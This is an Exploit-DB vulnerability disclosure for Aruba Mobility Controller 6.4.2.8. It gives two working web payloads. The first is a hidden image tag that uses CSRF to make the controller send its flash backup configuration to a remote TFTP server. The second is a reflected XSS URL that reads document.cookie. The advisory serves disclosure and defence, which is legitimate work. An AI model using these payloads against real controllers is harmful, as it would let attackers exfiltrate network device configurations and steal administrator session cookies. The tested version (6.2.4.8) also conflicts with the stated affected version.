Aruba Mobility Controller 6.4.2.8 - Multiple vulnerabilities

2015-08-20T00:00:00
ID EDB-ID:37891
Type exploitdb
Reporter Itzik Chen
Modified 2015-08-20T00:00:00

Description

Aruba Mobility Controller 6.4.2.8 - Multiple vulnerabilities. CVE-2015-5437. Webapps exploit for xml platform

                                        
                                            # Title: Aruba Mobility Controller CSRF And XSS Vulnerabilities
# Date: 08/016/2015
# Author: Itzik Chen
# Product web page: http://www.arubanetworks.com
# Affected Version: 6.4.2.8
# Tested on: Aruba7240, Ver 6.2.4.8

 

Summary
================

Aruba Networks is an HP company, one of the leaders in enterprise Wi-Fi.
Arube Controller suffers from CSRF and XSS vulnerabilities.



Proof of Concept - CSRF
=========================

192.168.0.1 - Controller IP-Address
172.17.0.1 - Remote TFTP server 

<IMG width=1 height=1 SRC="https://192.168.0.1:4343/screens/cmnutil/copyLocalFileToTftpServerWeb.xml?flashbackup.tar.gz,172.17.0.1,flashbackup.tar.gz">

That will send the flashbackup configuration file to a remote TFTP server.



Proof of Concept - XSS
=========================

https://192.168.0.1:4343/screens/switch/switch_mon.html?mode=plog-custom&mode-title=test</td><img width=1 height=1 src=/images/logo-mobility-controller.gif onLOAD=alert(document.cookie)>